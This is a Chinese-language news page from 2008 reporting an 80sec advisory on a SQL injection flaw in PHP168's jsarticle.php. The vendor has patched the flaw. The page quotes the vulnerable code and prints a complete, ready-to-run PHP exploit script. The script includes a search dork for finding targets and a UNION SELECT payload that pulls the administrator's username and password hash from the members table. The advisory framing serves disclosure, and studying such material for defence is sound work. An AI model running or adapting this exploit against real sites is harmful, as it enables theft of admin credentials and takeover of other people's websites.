当前位置：首页 > 新闻资讯 > 厂商开发 > > PHP168整站系统惊现严重的SQL注射漏洞

PHP168整站系统惊现严重的SQL注射漏洞

点击次数：36 次发布日期：2008-11-20 22:10:48 作者：源代码网

源代码网推荐

源代码网整理以下中国站长站（Chinaz.com）讯：从国内安全组织80sec获悉，前不久，“PHP168整站系统”惊现一个严重的SQL注射漏洞，可能被恶意用户查询数据库的敏感信息，容易被黑客控制整个网站。官方已经发布补丁，中国站长站提醒使用PHP168的站长们，尽快更新补丁，以免遭受不必要的损失。

源代码网整理以下漏洞说明：历经数年开发与完善的“PHP168整站系统”是国内最早的多功能模块化网站管理软件系统;不仅适合于建设一般的企业、政府、学校、个人等小型网站，同时也适合于建设地区门户、行业门户、收费网站等大中型网站，80sec在其产品中发现了一个严重的SQL注射漏洞，可能被恶意用户查询数据库的敏感信息，如管理员密码，加密key等等，从而控制整个网站。

源代码网整理以下漏洞厂商：http://www.php168.com

源代码网整理以下漏洞解析：在系统的jsarticle.php中，使用了urldecode用来解码用户提交的数据，但是在使用该函数之后并没有做进一步的有效性验证，从而导致精心构造的数据可以饶过系统的过滤以及php的Magic Quote保护，漏洞部分代码如下：

源代码网整理以下

elseif($type=="like")
{

$SQL.=" AND aid!="$id" ";

if(!$keyword)
{
extract($db->get_one("SELECT keywords AS keyword FROM {$pre}article WHERE aid="$id""));
}

if($keyword){
$SQL.=" AND ( ";
$keyword=urldecode($keyword);
$detail=explode(" ",$keyword);
unset($detail2);
foreach( $detail AS $key=>$value){
$detail2[]=” BINARY title LIKE ‘%$value%’ “;
}
$str=implode(” OR “,$detail2);
$SQL.=” $str ) “;
}else{
$SQL.=” AND 0 “;
}

$ORDER=’ list ‘;
}

if(!$webdb[viewNoPassArticle]){
$SQL.=’ AND yz=1 ‘;
}

$SQL=” WHERE $SQL ORDER BY $ORDER DESC LIMIT $rows”;
$which=’*";
$listdb=list_article($SQL,$which,$leng);

源代码网整理以下keyword被urldecode然后进入list_article函数，提交%2527将导致一个’进入SQL查询

源代码网整理以下在artic_function.php中的list_article函数如下

源代码网整理以下

直接进入SQl查询，导致注射漏洞的产生。

源代码网整理以下漏洞利用：80sec提供攻击测试代码如下：

源代码网整理以下

#!/usr/bin/php
<?php

print_r("
+---------------------------------------------------------------------------+
Php168 v2008 SQL injection / admin credentials disclosure exploit
by puret_t
mail: puretot at gmail dot com
team: http://www.wolvez.org
dork: "Powered by PHP168 V2008"
+---------------------------------------------------------------------------+
");
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
print_r("
+---------------------------------------------------------------------------+
Usage: php ".$argv[0]." host path
host: target server (ip/hostname)
path: path to php168
Example:
php ".$argv[0]." localhost /php168/
+---------------------------------------------------------------------------+
");
exit;
}

error_reporting(7);
ini_set("max_execution_time", 0);

$host = $argv[1];
$path = $argv[2];

$resp = send();
preg_match("/([a-z0-9]+)_article/", $resp, $pre);

if ($pre)
$resp = send();
else
exit("Exploit Failed! ");

preg_match("/content_([S]+)|([a-z0-9]{32})/", $resp, $pwd);

if ($pwd)
exit("Expoilt Success! admin: $pwd[1] Password(md5): $pwd[2] ");
else
exit("Exploit Failed! ");

function send()
{
global $host, $path, $pre;

if ($pre)
$cmd = "type=like&keyword=%2527)/**/UNION/**/SELECT/**/1,1,1,1,CONCAT(username,%2527|%2527,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/".$pre[1]."_members/**/WHERE/**/uid=1%23";
else
$cmd = "type=like&keyword=%2527";

$message = "POST ".$path."jsarticle.php HTTP/1.1 ";
$message .= "Accept: */* ";
$message .= "Accept-Language: zh-cn ";
$message .= "Content-Type: application/x-www-form-urlencoded ";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1) ";
$message .= "Host: $host ";
$message .= "Content-Length: ".strlen($cmd)." ";
$message .= "Connection: Close ";
$message .= $cmd;

$fp = fsockopen($host, 80);
fputs($fp, $message);

$resp = "";

while ($fp && !feof($fp))
$resp .= fread($fp, 1024);

return $resp;
}

?>

源代码网整理以下漏洞状态：已经通知php168官方，官方已经发布补丁。

源代码网供稿.

上一篇: 张樊:"360杀毒"免费，周鸿祎欺骗用户？下一篇: 安全软件烽火起揭露360免费真相(视频)

网友评论 (0)

我也要写评论

PHP168整站系统惊现严重的SQL注射漏洞的相关新闻